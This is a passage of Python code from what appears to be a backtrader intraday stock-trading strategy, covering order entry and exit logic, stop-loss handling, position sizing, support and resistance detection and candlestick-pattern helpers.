price for stop loss calculations. Determine atr timeframe based on user defined parameter. eval turns the string into an attribute lookup that returns a value\n\t\t\t\tself.atr_mod= eval('self.atr_t{}'.format(modelp.get('atr_tframe')))\n\t\t\t\tself.atr_dist = self.atr_mod * indp.get('atrdist')\n\t\t\t\t\n\t\t\t\t#Determine open gap\n\t\t\t\tself.gap = self.open_gap(self.name_t0,d)\t\n\t\t\t\t\t\n\t\t\t\t#Determine open 15 minute range\n\t\t\t\tself.range_high = self.open_range('high',self.name_t0)\n\t\t\t\tself.range_low = self.open_range('low',self.name_t0)\n\t\t\t\t\n\t\t\t\t#Calculate sizing and exit prices for base trading timeframe\n\t\t\t\tif d._name == d._name[:-1]+'0':\t#For a single timeframe only (timeframe 0)\n\t\t\t\t\t#Pull target exit prices from dictionary\n\t\t\t\t\tself.short_exit_price = self.target_short_dict[self.name_t0]\n\t\t\t\t\tself.long_exit_price = self.target_long_dict[self.name_t0] \n\t\t\t\t\t#Calculate Size for single timeframe only\n\t\t\t\t\tself.size = self.sizing(d,self.name_t0,modelp.get('total_dollars_risked'),modelp.get('dollars_risked_per_trade'),self.atr_mod)\n\t\t\t\t\n\t\t\t\t#Ensure we have the cash to afford next position\n\t\t\t\tpos_cost = self.size * d.close[0] \n\t\t\t\t\n\t\t\t\t#Get Positions and toggle inorder status to false if stop-loss was executed (when position size becomes '0'). Used default dict to collect multiple values for each key in dictionary\t\n\t\t\t\tself.pos = self.getposition(d).size\n\t\t\t\tself.pos_dict[d._name].append(self.pos) #add position size to dictionary\n\t\t\t\tmycount = sum(map(len,self.pos_dict.values())) #determine count of values in defaultdict\n\t\t\t\tif mycount > (len(UserInputs.datalist('hist'))*3): #dic count is greater than tickers * # of datas\n\t\t\t\t\tif (self.pos_dict[d._name][-2]!=0 and self.pos_dict[d._name][-1]==0 and self.inorder_dict[d._name] == True):\n\t\t\t\t\t\tself.inorder_dict[d._name] = False \n\t\t\t\t\t\n\t\t\t\t#DEFINE OVERALL ENTRY LOGIC FOR LONG AND SHORT\n\t\t\t\tif (\n\t\t\t\t\tcash_avail > pos_cost\n\t\t\t\t\tand self.pos==0\n\t\t\t\t\tand not self.inorder_dict.get(d._name)\n\t\t\t\t\tand self.prenext_done #Start trading after all prenext data loads\n\t\t\t\t\tand (self.hourmin>='08:50' and self.hourmin<='10:00')\n\t\t\t\t\t): \t\n\t\t\t\t\t#DEFINE LONG ENTRY LOGIC\n\t\t\t\t\tif(\t#self.slope_t1 > 0\n\t\t\t\t\t\t#self.bullish_engulfing_pattern_t1\n\t\t\t\t\t\tself.slope_t1 > 0\n\t\t\t\t\t\tand self.slope_t2 > 0\n\t\t\t\t\t\tand d.close[0] < self.sup_t1\n\t\t\t\t\t\t#and self.adx_t1 > 25\n\t\t\t\t\t\t#and d.high[0]>self.range_high\n\t\t\t\t\t\t#and (self.bullish_three_line_strike_pattern_t0 or self.bullish_engulfing_pattern_t0)\n\t\t\t\t\t\t#and self.percK_t0<20\n\t\t\t\t\t\t#and self.percK_t1<30\n\t\t\t\t\t\t#and d.low[0] <= self.sup_t1\n\t\t\t\t\t\t#and self.slope_time2 > 0\n\t\t\t\t\t\t#and d.high[0]>d.high[-1]\n\t\t\t\t\t\t#and d.volume[0] > d.volume[-1] * 3\n\t\t\t\t\t ):\n\t\t\t\t\t\t \t\t \n\t\t\t\t\t\tif d._name == d._name[:-1]+'0':\t#Trade basetimeframe only\n\t\t\t\t\t\t\t#CREATE LONG ENTRY ORDER\n\t\t\t\t\t\t\t#if not (d._name[:-1]=='VIX' or d._name[:-1]=='TICK-NYSE' or d._name[:-1]=='TRIN-NYSE' or d._name[:-1]=='SPY'):\n\t\t\t\t\t\t\tif not modelp.get('live_status'):\n\t\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t\t#Create Long Order\n\t\t\t\t\t\t\t\tlong_name = '{} - Enter Long Trade'.format(d._name)\n\t\t\t\t\t\t\t\tself.long_ord = self.buy(data=d._name,\n\t\t\t\t\t\t\t\t\t\t\t\t\tsize=self.size,\n\t\t\t\t\t\t\t\t\t\t\t\t\texectype=bt.Order.Market,\n\t\t\t\t\t\t\t\t\t\t\t\t\ttransmit=False,\n\t\t\t\t\t\t\t\t\t\t\t\t\tname = 
long_name)\n\t\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t\t#Create size dictionary so same size can be referenced when you exit trade\n\t\t\t\t\t\t\t\tself.size_dict[d._name] = self.size\n\t\t\t\t\t\t\t\t#Track if currently in an order or not\n\t\t\t\t\t\t\t\tself.inorder_dict[d._name] = True\n\t\t\t\t\t\t\t\t#Set target prices to be referenced when you exit trade\n\t\t\t\t\t\t\t\tself.target_long_price = round((d.open[0]+(modelp.get('dollars_risked_per_trade')*modelp.get('target'))/self.size),3)\n\t\t\t\t\t\t\t\tself.target_long_dict[d._name] = round(self.target_long_price,3)\t\n\t\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t\tif modelp.get('TrailingStop'):\n\t\t\t\t\t\t\t\t\t#Create Trailing Long Stop Loss\n\t\t\t\t\t\t\t\t\tlong_stop_name = '{} - Trailing StopLoss for Long Entry'.format(d._name)\n\t\t\t\t\t\t\t\t\tself.long_stop_ord = self.sell(data=d._name,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\tsize=self.size,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\texectype=bt.Order.StopTrail,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\tprice=self.stoploss('long',d,self.size,modelp.get('dollars_risked_per_trade')),\n\t\t\t\t\t\t\t\t\t\t\t\t\t\ttrailamount = self.atr_dist,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\ttransmit=True,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\tparent=self.long_ord,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\tname=long_stop_name)\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t\telif not modelp.get('TrailingStop'):\n\t\t\t\t\t\t\t\t\t#Create Fixed Long Stop Loss\n\t\t\t\t\t\t\t\t\tlong_stop_name = '{} - Fixed StopLoss for Long Entry'.format(d._name)\n\t\t\t\t\t\t\t\t\tself.long_stop_ord = self.sell(data=d._name,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\tsize=self.size,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\texectype=bt.Order.Stop,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\tprice=self.stoploss('long',d,self.size,modelp.get('dollars_risked_per_trade')),\n\t\t\t\t\t\t\t\t\t\t\t\t\t\ttransmit=True,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\tparent=self.long_ord,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\tname=long_stop_name)\n\t\t\t\t\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t\tself.longstop_dict[d._name] = self.long_stop_ord\n\t\n\t\t\t\t\t\telif modelp.get('live_status') and self.data_live:\n\t\t\t\t\t\t\t#Create Long Entry Order\n\t\t\t\t\t\t\tlong_name = '{} - Enter Long Trade'.format(d._name)\n\t\t\t\t\t\t\tself.long_ord = self.buy(data=d._name,\n\t\t\t\t\t\t\t\t\t\t\t\tsize=self.size,\n\t\t\t\t\t\t\t\t\t\t\t\texectype=bt.Order.Market,\n\t\t\t\t\t\t\t\t\t\t\t\ttransmit=False,\n\t\t\t\t\t\t\t\t\t\t\t\t)\n\t\t\t\t\t\t\t\n\t\t\t\t\t\t\tself.size_dict[d._name] = self.size\n\t\t\t\t\t\t\tself.target_long_price = round((d.open[0]+(modelp.get('dollars_risked_per_trade')*modelp.get('target'))/self.size),3)\n\t\t\t\t\t\t\tself.target_long_dict[d._name] = round(self.target_long_price,3)\n\t\t\t\t\t\t\t\n\t\t\t\t\t\t\tif modelp.get('TrailingStop'):\n\t\t\t\t\t\t\t\t#Create Trailing Long Stop Loss\n\t\t\t\t\t\t\t\tlong_stop_name = '{} - Trailing StopLoss for Long Entry'.format(d._name)\n\t\t\t\t\t\t\t\tself.long_stop_ord = self.sell(data=d._name,\n\t\t\t\t\t\t\t\t\t\t\t\t\tsize=self.size,\n\t\t\t\t\t\t\t\t\t\t\t\t\texectype=bt.Order.StopTrail,\n\t\t\t\t\t\t\t\t\t\t\t\t\tprice=self.stoploss('long',d,self.size,modelp.get('dollars_risked_per_trade')),\n\t\t\t\t\t\t\t\t\t\t\t\t\ttrailamount = self.atr_dist,\n\t\t\t\t\t\t\t\t\t\t\t\t\ttransmit=True,\n\t\t\t\t\t\t\t\t\t\t\t\t\tparent=self.long_ord,\n\t\t\t\t\t\t\t\t\t\t\t\t\tname=long_stop_name)\n\t\t\t\t\t\t\t\t\t\t\t\t\t\n\t\t\t\t\t\t\telif not modelp.get('TrailingStop'):\n\t\t\t\t\t\t\t\t#Create Fixed Long Stop Loss\n\t\t\t\t\t\t\t\tlong_stop_name = '{} - Fixed StopLoss for Long 
Entry'.format(d._name)\n\t\t\t\t\t\t\t\tself.long_stop_ord = self.sell(data=d._name,\n\t\t\t\t\t\t\t\t\t\t\t\t\tsize=self.size,\n\t\t\t\t\t\t\t\t\t\t\t\t\texectype=bt.Order.Stop,\n\t\t\t\t\t\t\t\t\t\t\t\t\tprice=self.stoploss('long',d,self.size,modelp.get('dollars_risked_per_trade')),\n\t\t\t\t\t\t\t\t\t\t\t\t\ttransmit=True,\n\t\t\t\t\t\t\t\t\t\t\t\t\tparent=self.long_ord,\n\t\t\t\t\t\t\t\t\t\t\t\t\tname=long_stop_name)\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\n\t\t\t\t\t\t\tself.longstop_dict[d._name] = self.long_stop_ord\n\t\t\t\t\t\t\tself.bought = len(self) #stores bar number when trade was entered\n\t\t\n\t\t\t\t\t#DEFINE SHORT ENTRY LOGIC\n\t\t\t\t\telif (\t#d.volume[0] > d.volume[-1]*3\n\t\t\t\t\t\t\t#and d.open[0] 25\n\t\t\t\t\t\t\t#self.slope_t0 < 0\n\t\t\t\t\t\t\tself.slope_t1 < 0\n\t\t\t\t\t\t\tand self.slope_t2 < 0\n\t\t\t\t\t\t\tand d.close[0]>self.res_t1\n\t\t\t\t\t\t\t#and (self.bearish_three_line_strike_pattern_t0 or self.bearish_engulfing_pattern_t0)\n\t\t\t\t\t\t\t#and self.bearish_engulfing_pattern_t1\n\t\t\t\t\t\t\t#and d.low[0]>self.range_low\n\t\t\t\t\t\t\t#and self.percK_t0>80\n\t\t\t\t\t\t\t#and self.percK_t1>70\n\t\t\t\t\t\t\t#and self.slope_time2 < 0\n\t\t\t\t\t\t\t#and d.high[0] >= self.res_t1\n\t\t\t\t\t\t\t#and d.low[0]>d.low[-1]\n\t\t\t\t\t\t\t#and d.volume[0] > d.volume[-1] * 3\n\t\t\t\t\t\t ):\n\t\t\t\t\n\t\t\t\t\t\t\tif d._name == d._name[:-1]+'0': #Trade basetimeframe only\n\t\t\t\t\t\t\t\t#SHORT ENTRY ORDER\n\t\t\t\t\t\t\t\t#if not (d._name[:-1]=='VIX' or d._name[:-1]=='TICK-NYSE' or d._name[:-1]=='TRIN-NYSE' or d._name[:-1]=='SPY'):\n\t\t\t\t\t\t\t\t\tif not modelp.get('live_status'):\n\t\t\t\t\t\t\t\t\t\t#Create Short Entry Order\n\t\t\t\t\t\t\t\t\t\tshort_name = '{} - Enter Short Trade'.format(d._name)\n\t\t\t\t\t\t\t\t\t\tself.short_ord = self.sell(data=d._name,\n\t\t\t\t\t\t\t\t\t\t\t size=self.size,\n\t\t\t\t\t\t\t\t\t\t\t exectype=bt.Order.Market,\n\t\t\t\t\t\t\t\t\t\t\t transmit=False,\n\t\t\t\t\t\t\t\t\t\t\t name=short_name,\n\t\t\t\t\t\t\t\t\t\t\t )\n\t\t\t\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t\t\t\tself.size_dict[d._name] = self.size\n\t\t\t\t\t\t\t\t\t\tself.inorder_dict[d._name] = True\n\t\t\t\t\t\t\t\t\t\tself.target_short_price = round((d.open[0]-(modelp.get('dollars_risked_per_trade')*modelp.get('target'))/self.size),3)\n\t\t\t\t\t\t\t\t\t\tself.target_short_dict[d._name] = round(self.target_short_price,3)\n\t\t\t\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t\t\t\tif modelp.get('TrailingStop'):\n\t\t\t\t\t\t\t\t\t\t\t#Create Trailing Short Stop Loss\t \n\t\t\t\t\t\t\t\t\t\t\tshort_stop_name = '{} - Trailing StopLoss for Short Entry'.format(d._name)\n\t\t\t\t\t\t\t\t\t\t\tself.short_stop_ord = self.buy(data=d._name,\n\t\t\t\t\t\t\t\t\t\t\t\tsize=self.size,\n\t\t\t\t\t\t\t\t\t\t\t\texectype=bt.Order.StopTrail,\n\t\t\t\t\t\t\t\t\t\t\t\tprice=self.stoploss('short',d,self.size,modelp.get('dollars_risked_per_trade')),\n\t\t\t\t\t\t\t\t\t\t\t\ttrailamount = self.atr_dist,\n\t\t\t\t\t\t\t\t\t\t\t\ttransmit=True,\n\t\t\t\t\t\t\t\t\t\t\t\tparent=self.short_ord,\n\t\t\t\t\t\t\t\t\t\t\t\tname = short_stop_name,\n\t\t\t\t\t\t\t\t\t\t\t\t)\n\t\t\t\t\t\t\t\t\t\telif not modelp.get('TrailingStop'):\n\t\t\t\t\t\t\t\t\t\t\t#Create Fixed Short Stop Loss\t \n\t\t\t\t\t\t\t\t\t\t\tshort_stop_name = '{} - Fixed StopLoss for Short Entry'.format(d._name)\n\t\t\t\t\t\t\t\t\t\t\tself.short_stop_ord = 
self.buy(data=d._name,\n\t\t\t\t\t\t\t\t\t\t\t\tsize=self.size,\n\t\t\t\t\t\t\t\t\t\t\t\texectype=bt.Order.Stop,\n\t\t\t\t\t\t\t\t\t\t\t\tprice=self.stoploss('short',d,self.size,modelp.get('dollars_risked_per_trade')),\n\t\t\t\t\t\t\t\t\t\t\t\ttransmit=True,\n\t\t\t\t\t\t\t\t\t\t\t\tparent=self.short_ord,\n\t\t\t\t\t\t\t\t\t\t\t\tname = short_stop_name,\n\t\t\t\t\t\t\t\t\t\t\t\t)\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t\t\t\tself.shortstop_dict[d._name] = self.short_stop_ord #dictionary needed by cancel order to access all symbols instead of last symbol\n\t\t\t\t\t\t\t\t\t\tself.sold = len(self) #stores bar number when trade was entered\n\t\t\t\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t\t\telif modelp.get('live_status') and self.data_live:\n\t\t\t\t\t\t\t\t\t\t#Create Short Entry Order\n\t\t\t\t\t\t\t\t\t\tshort_name = '{} - Short Entry'.format(d._name)\n\t\t\t\t\t\t\t\t\t\tself.short_ord = self.sell(data=d._name,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tsize=self.size,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\texectype=bt.Order.Market,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\ttransmit=False,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t)\n\t\t\t\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t\t\t\tself.size_dict[d._name] = self.size\n\t\t\t\t\t\t\t\t\t\tself.target_short_price = round((d.open[0]-(modelp.get('dollars_risked_per_trade')*modelp.get('target'))/self.size),3)\n\t\t\t\t\t\t\t\t\t\tself.target_short_dict[d._name] = round(self.target_short_price,3)\t\n\t\t\t\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t\t\t\tif modelp.get('TrailingStop'):\n\t\t\t\t\t\t\t\t\t\t\t#Create Trailing Short Stop Loss\t \n\t\t\t\t\t\t\t\t\t\t\tshort_stop_name = '{} - Trailing StopLoss for Short Entry'.format(d._name)\n\t\t\t\t\t\t\t\t\t\t\tself.short_stop_ord = self.buy(data=d._name,\n\t\t\t\t\t\t\t\t\t\t\t\tsize=self.size,\n\t\t\t\t\t\t\t\t\t\t\t\texectype=bt.Order.StopTrail,\n\t\t\t\t\t\t\t\t\t\t\t\tprice=self.stoploss('short',d,self.size,modelp.get('dollars_risked_per_trade')),\n\t\t\t\t\t\t\t\t\t\t\t\ttrailamount = self.atr_dist,\n\t\t\t\t\t\t\t\t\t\t\t\ttransmit=True,\n\t\t\t\t\t\t\t\t\t\t\t\tparent=self.short_ord,\n\t\t\t\t\t\t\t\t\t\t\t\tname = short_stop_name,\n\t\t\t\t\t\t\t\t\t\t\t\t)\n\t\t\t\t\t\t\t\t\t\telif not modelp.get('TrailingStop'):\n\t\t\t\t\t\t\t\t\t\t\t#Create Fixed Short Stop Loss\t \n\t\t\t\t\t\t\t\t\t\t\tshort_stop_name = '{} - Fixed StopLoss for Short Entry'.format(d._name)\n\t\t\t\t\t\t\t\t\t\t\tself.short_stop_ord = self.buy(data=d._name,\n\t\t\t\t\t\t\t\t\t\t\t\tsize=self.size,\n\t\t\t\t\t\t\t\t\t\t\t\texectype=bt.Order.Stop,\n\t\t\t\t\t\t\t\t\t\t\t\tprice=self.stoploss('short',d,self.size,modelp.get('dollars_risked_per_trade')),\n\t\t\t\t\t\t\t\t\t\t\t\ttransmit=True,\n\t\t\t\t\t\t\t\t\t\t\t\tparent=self.short_ord,\n\t\t\t\t\t\t\t\t\t\t\t\tname = short_stop_name,\n\t\t\t\t\t\t\t\t\t\t\t\t)\n\t\t\t\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t\t\t\tself.shortstop_dict[d._name] = self.short_stop_ord #dictionary needed by cancel order to access all symbols instead of last symbol\n\t\t\t\n\t\t\t\t#********************************EXIT LOGIC/ORDERS*********************************************\n\t\t\t\telse:\n\t\t\t\t\t#EXIT LOGIC FOR SHORTS\n\t\t\t\t\tif (d._name == d._name[:-1]+'0'\n\t\t\t\t\t\t#and not (d._name[:-1]=='VIX' or d._name[:-1]=='TICK-NYSE' or d._name[:-1]=='TRIN-NYSE' or d._name[:-1]=='SPY')\t\n\t\t\t\t\t\tand self.pos < 0\n\t\t\t\t\t\tand self.inorder_dict.get(d._name)\n\t\t\t\t\t\tand self.prenext_done #Start trading after all prenext data loads \n\t\t\t\t\t\tand (self.short_exit_price is not None and d.open[0] <= self.short_exit_price) #or 
self.hourmin=='14:50')\t\n\t\t\t\t\t\t):\t\t\n\t\n\t\t\t\t\t\t#SHORT EXIT ORDER - closes existing position and cancels outstanding stop-loss ord\t\n\t\t\t\t\t\tself.exit_short_name = '{} - Exit Short Trade'.format(d._name) \n\t\t\t\t\t\tself.exit_short = self.close(d._name,\n\t\t\t\t\t\t\t\t\t\t\t\t\tsize=self.size_dict.get(d._name),\n\t\t\t\t\t\t\t\t\t\t\t\t\tname=self.exit_short_name)\n\t\n\t\t\t\t\t\tself.inorder_dict[d._name] = False\n\t\t\t\t\t\tshort_stop_ord = self.shortstop_dict.get(d._name) #Need dictionary or else self.cancel_shortstop will only call the last symbol returned for short_stop_ord (not all symbols)\n\t\t\t\t\t\tself.cancel_shortstop = self.cancel(short_stop_ord) \n\t\n\t\t\t\t\t#EXIT LOGIC FOR LONGS\n\t\t\t\t\telif (d._name == d._name[:-1]+'0'\n\t\t\t\t\t\t#and not (d._name[:-1]=='VIX' or d._name[:-1]=='TICK-NYSE' or d._name[:-1]=='TRIN-NYSE' or d._name[:-1]=='SPY')\t\n\t\t\t\t\t\tand self.pos > 0\n\t\t\t\t\t\tand (self.datastatus or self.prenext_done) #Start trading after all prenext loads (live and backtest modes) \n\t\t\t\t\t\tand (self.long_exit_price is not None and d.open[0] >= self.long_exit_price) #or self.hourmin=='14:50')\n\t\t\t\t\t\t):\n\t\t\t\t\t\t\n\t\t\t\t\t\t#LONG EXIT ORDER - closes existing position and cancels outstanding stop-loss order\n\t\t\t\t\t\tself.exit_long_name = '{} - Exit Long Trade'.format(d._name)\n\t\t\t\t\t\t\n\t\t\t\t\t\tself.exit_long = self.close(d._name,\n\t\t\t\t\t\t\t\t\t\t\t\t\tsize=self.size_dict.get(d._name),\n\t\t\t\t\t\t\t\t\t\t\t\t\tname=self.exit_long_name)\n\t\t\t\t\t\t\n\t\t\t\t\t\tself.inorder_dict[d._name] = False\t\t\t\t\t\t\n\t\t\t\t\t\tlong_stop_ord = self.longstop_dict.get(d._name)\n\t\t\t\t\t\tself.cancel_longstop = self.cancel(long_stop_ord)\t\t\t\t\n\t\t\t\t\t\t\t\n\t\t\t\t#-------------------------------OUTPUT RESULTS--------------------------------------------\n\t\t\t\t#PRINT RESULTS\n\t\t\t\tif UserInputs.model_params().get('printlines') or modelp.get('live_status'): #need to ensure all data has loaded for longest indicators\n\t\t\t\t\tout = [ 'Strategy: {}'.format(len(self)),\n\t\t\t\t\t\t\t'Data {}'.format(str(i)), \n\t\t\t\t\t\t\td._name,\n\t\t\t\t\t\t\t#len(self.data0),\n\t\t\t\t\t\t\t#len(self.data1),\n\t\t\t\t\t\t\t#len(self.data2),\n\t\t\t\t\t\t\t#len(self.data3),\n\t\t\t\t\t\t\t#self.counter,len(d),\n\t\t\t\t\t\t\td.datetime.datetime().strftime('%Y-%m-%d %H:%M:%S'),\n\t\t\t\t\t\t\tself.atr_mod,\n\t\t\t\t\t\t\td.open[0],\n\t\t\t\t\t\t\td.high[0],\n\t\t\t\t\t\t\td.low[0],\n\t\t\t\t\t\t\td.close[0],\n\t\t\t\t\t\t\t#self.sup_dict.get(d._name),\n\t\t\t\t\t\t\t#self.sup_t1,\n\t\t\t\t\t\t\tself.slope_t0,\n\t\t\t\t\t\t\tself.range_high,\n\t\t\t\t\t\t\tself.range_low,\n\t\t\t\t\t\t\t#self.slope_t1,\n\t\t\t\t\t\t\t]\t\t\t\t\t\n\t\t\t\t\tprint(','.join(str(x) for x in out))\n\t\t\t\t\t\t\t\t\n\t\t\t#TIMER (to determine code speed)\n\t\t\tif UserInputs.model_params().get('timer')=='on' and self.nextcounter == len(self.datas):\n\t\t\t\tself.nextcounter=0\n\t\t\t\tt1 = datetime.utcnow() \n\t\t\t\tdiff = t1-self.t0\n\t\t\t\tprint(diff.total_seconds())\n\n\t#-------------------------------Key Strategy Methods-------------------------------------------------------------------\n\tdef maxtimeframe(self):\n\t\t#Determine max timeframe used by program, and return its length - ensures enough data has loaded to start calc.\n\t\ttime1 = UserInputs.model_params().get('timeframe1on')\n\t\ttime2 = UserInputs.model_params().get('timeframe2on')\n\t\tif time1 and time2:\n\t\t\tfor x in range(2, len(self.datas)):\n\t\t\t\t\td = 
self.datas[x]\n\t\t\t\t\tif len(d)>0:\n\t\t\t\t\t\tbreak\n\t\t\treturn(len(d))\n\t\tif time1 and not time2:\n\t\t\tfor x in range(1, len(self.datas)):\n\t\t\t\t\td = self.datas[x]\n\t\t\t\t\tif len(d)>0:\n\t\t\t\t\t\tbreak\n\t\t\treturn(len(d))\n\t\telse:\n\t\t\tfor x in range(0, len(self.datas)):\n\t\t\t\t\td = self.datas[x]\n\t\t\t\t\tif len(d)>0:\n\t\t\t\t\t\tbreak\n\t\t\treturn(len(d))\n\t\t\t\n\tdef max_ind_period(self):\n\t\t#Determine lookback period of longest indicator\n\t\tindicator_dict = UserInputs.ind_params()\n\t\tmax_ind = max(indicator_dict.values()) \n\t\treturn max_ind\n\t\t\n\tdef resistance(self,high,low,min_touches,tolerance_perc,bounce_perc):\n\t\t#Identifies resistance levels\n\t\t#Set default value for resistance level to 10000 (meaning no resistance found)\n\t\tres = 10000\n\t\t\n\t\t#Identifying local high and local low\n\t\tmaxima = max(high) #High represents a series of highs over specific lookback period\n\t\t#print('Maxima {}'.format(maxima))\n\t\t\n\t\tminima = min(low)\t#Low represents a series of lows over specific lookback period\n\t\n\t\t#Calculate distance between max and min (total price movement)\n\t\tmove_range = maxima - minima\n\t\t\n\t\t#Calculate bounce distance and allowable margin of error for proximity to support/resistance \n\t\tmove_allowance = move_range * (tolerance_perc/100)\n\t\tbounce_distance = move_range * (bounce_perc/100)\n\t\t\n\t\t#Test resistance by iterating through data to check for touches delimited by bounces\n\t\ttouchdown = 0\n\t\tawaiting_bounce = False\n\t\tfor x in range(0,len(high)):\n\t\t\tif abs(maxima - high[x]) < move_allowance and not awaiting_bounce:\n\t\t\t\ttouchdown = touchdown + 1\n\t\t\t\tawaiting_bounce = True\n\t\t\telif abs(maxima - high[x]) > bounce_distance:\n\t\t\t\tawaiting_bounce = False\n\t\tif touchdown >= min_touches:\n\t\t\tres = maxima\n\t\treturn res\n\t\t\n\tdef support(self,high,low,min_touches,tolerance_perc,bounce_perc):\n\t\t#Identifies support levels\n\t\t#Set default value for support level to 0 (meaning no support found)\n\t\tsup = 0\n\t\t\n\t\t#Identifying local high and local low\n\t\tmaxima = max(high) #High represents a series of highs over specific lookback period\n\t\tminima = min(low)\t#Low represents a series of lows over specific lookback period\n\t\n\t\t#Calculate distance between max and min (total price movement)\n\t\tmove_range = maxima - minima\n\t\t\n\t\t#Calculate bounce distance and allowable margin of error for proximity to support/resistance \n\t\tmove_allowance = move_range * (tolerance_perc/100)\n\t\tbounce_distance = move_range * (bounce_perc/100)\t\n\t\t#Test support by iterating through data to check for touches delimited by bounces\n\t\ttouchdown = 0\n\t\tawaiting_bounce = False\n\t\tfor x in range(0,len(low)):\n\t\t\tif abs(low[x] - minima) < move_allowance and not awaiting_bounce:\n\t\t\t\ttouchdown = touchdown + 1\n\t\t\t\tawaiting_bounce = True\n\t\t\telif abs(low[x] - minima) > bounce_distance:\n\t\t\t\tawaiting_bounce = False\n\t\tif touchdown >= min_touches:\n\t\t\tsup = minima\n\t\treturn sup\t\n\t\n\tdef stoploss(self,direction,mydata,size,dolrisk):\n\t\t#Creates stop loss price for both long and short orders, based on dollars risked per trade (close +/- dolrisk/size)\n\t\tif direction == 'short':\n\t\t\tshort_stop = ((mydata.close[0]*size)+dolrisk)/size\n\t\t\treturn round(short_stop,2)\n\t\telif direction == 'long':\n\t\t\tlong_stop = ((mydata.close[0]*size)-dolrisk)/size \n\t\t\treturn round(long_stop,2)\n\n\tdef sizing(self,data,data_name,total_dollars_risked,dollars_risked_trade,atr):\n\t\t#Creates an order size based on price 
volatility(atr) and dollars risked per trade\n\t\tif(len(data)<=UserInputs.ind_params().get('atrperiod')):return 0\n\t\t\n\t\tmaxsize = total_dollars_risked/data.close[0] #size based on max investment per trade\n\t\tatrdist = UserInputs.ind_params().get('atrdist')\n\t\tatrsize = dollars_risked_trade/(atr*atrdist) #size based on atr\n\t\t\n\t\tsize = int(min(atrsize,maxsize)) #needs to be an integer for IB to process. Ensures size doesn't cost more than total_dollars_risked\n\t\treturn size \n\n\tdef open_gap(self,ticker,mydata):\n\t\t#Determine opening gap from yesterday's close\n\t\tif self.hourmin == '08:30':\n\t\t\tgap = (mydata.open[0]-mydata.close[-1])/mydata.close[0]*100\n\t\t\t#Add self.gap to dictionary, with key name as stock name and value as self.gap, so we can access all stocks instead of just last one\t\t\n\t\t\tself.gap_dict[ticker] = round(gap,3)\n\t\t\t\n\t\t#look up symbol name within gap dictionary you just created above and return gap as self.open_gap\n\t\topen_gap = self.gap_dict.get(ticker)\n\t\treturn open_gap\n\n\tdef open_range(self,direction,data_name):\n\t\t#Determines high and low opening range for day\n\t\tif self.hourmin == '08:50':\n\t\t\trng_high = round(self.inds[data_name]['highest'][0],2)\n\t\t\trng_low = round(self.inds[data_name]['lowest'][0],2)\n\t\t\tself.rnghigh_dict[data_name] = round(rng_high,3)\n\t\t\tself.rnglow_dict[data_name] = round(rng_low,3)\n\t\n\t\tif direction=='high':\n\t\t\topen_range = self.rnghigh_dict.get(data_name)\n\t\telif direction=='low':\n\t\t\topen_range = self.rnglow_dict.get(data_name)\n\t\treturn open_range\n\t\t\t\n\tdef average_atr(self,data_name):\n\t\t#Determines average of atr's so we can back into volatility\n\t\tatr = self.inds[data_name]['atr'][0]\n\t\tself.atr_list.append(atr)\n\t\t#if avg_atr_per is 5, it averages the last 5 period atr's\n\t\tavg_atr = sum(self.atr_list[-UserInputs.ind_params().get('avg_atr_per'):])/len(self.atr_list[-UserInputs.ind_params().get('avg_atr_per'):])\n\t\treturn avg_atr\n\t\t\n\tdef bullish_engulfing(self,mydata,slope):\n\t\t#Candlestick reversal pattern - long signal\n\t\t\n\t\tif (slope < 0\n\t\t\tand mydata.close[-1]< mydata.open[-1]\n\t\t\tand mydata.close[0] > mydata.open[0]\n\t\t\tand mydata.close[0] > mydata.open[-1]\n\t\t\tand mydata.open[0] < mydata.close[-1]\n\t\t\t):\n\t\t\tsignal = True\n\t\telse:\n\t\t\tsignal = False\n\t\treturn signal\n\t\t\n\tdef bearish_engulfing(self,mydata,slope):\n\t\t#Candlestick reversal pattern - short signal\n\t\tif (slope > 0\n\t\t\tand mydata.close[-1]> mydata.open[-1]\n\t\t\tand mydata.close[0] < mydata.open[0]\n\t\t\tand mydata.close[0] < mydata.open[-1]\n\t\t\tand mydata.open[0] > mydata.close[-1]\n\t\t\t):\n\t\t\tsignal = True\n\t\telse:\n\t\t\tsignal = False\n\t\treturn signal\n\t\t\t\n\tdef bullish_three_line_strike(self,mydata):\n\t\t#Candlestick pattern\n\t\tif (mydata.close[-2]< mydata.close[-3]\n\t\t\tand mydata.close[-1]< mydata.close[-2]\n\t\t\tand mydata.open[-2] < mydata.open[-3]\n\t\t\tand mydata.open[-1] < mydata.open[-2]\n\t\t\tand mydata.open[0] < mydata.open[-1]\n\t\t\tand mydata.open[0] <= mydata.close[-1]\n\t\t\tand mydata.close[0] > mydata.open[-3]\n\t\t\t):\n\t\t\tsignal = True\n\t\telse:\n\t\t\tsignal = False\n\t\treturn signal\n\n\tdef bearish_three_line_strike(self,mydata):\n\t\t#Candlestick pattern\n\t\tif (mydata.close[-2]> mydata.close[-3]\n\t\t\tand mydata.close[-1]> mydata.close[-2]\n\t\t\tand mydata.open[-2] > 